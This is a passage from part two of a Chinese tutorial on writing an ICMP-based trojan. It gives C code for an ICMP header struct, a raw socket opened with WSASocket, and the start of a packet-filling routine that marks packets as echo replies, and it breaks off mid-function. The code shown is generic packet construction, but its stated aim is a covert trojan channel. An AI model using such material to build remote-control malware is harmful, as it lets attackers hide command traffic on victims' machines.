基于ICMP的木马的编写！！！！！！(2)

　　然后定义一个ICMP首部：

typedef struct _ihdr {

　BYTE i_type; //8位类型

　BYTE i_code; //8位代码

　USHORT i_cksum; //16位校验和

　USHORT i_id; //识别号（一般用进程号作为识别号）

　USHORT i_seq; //报文序列号

　ULONG timestamp; //时间戳

}IcmpHeader;

　　这时可以同过WSASocket建立一个原始套接口：

SockRaw=WSASocket(

　　　　　　　　　　AF_INET, //协议族

　　　　　　　　　　SOCK_RAW, //协议类型，SOCK_RAW表示是原始套接口

　　　　　　　　　　IPPROTO_ICMP, //协议，IPPROTO_ICMP表示ICMP数据报

　　　　　　　　　　NULL, //WSAPROTOCOL_INFO置空

　　　　　　　　　　0, //保留字，永远置为0

　　　　　　　　　　WSA_FLAG_OVERLAPPED //标志位

　　　　　　　　　　);

　　注：为了使用发送接收超时设置（设置SO_RCVTIMEO, SO_SNDTIMEO），必须将标志位置为WSA_FLAG_OVERLAPPED

　　随后你可以使用fill_icmp_data子程序填充ICMP报文段：

fill_icmp_data函数：

void fill_icmp_data(char * icmp_data, int datasize)

{

　IcmpHeader *icmp_hdr;

　char *datapart;

　icmp_hdr = (IcmpHeader*)icmp_data;

　icmp_hdr->i_type = ICMP_ECHOREPLY; //类型为ICMP_ECHOREPLY

　icmp_hdr->i_code = 0;

　icmp_hdr->i_id = (USHORT)GetCurrentProcessId(); //识别号为进程号

　icmp_hdr->i_cksum = 0; //校验和初始化

　icmp_hdr->i_seq = 0; //序列号初始化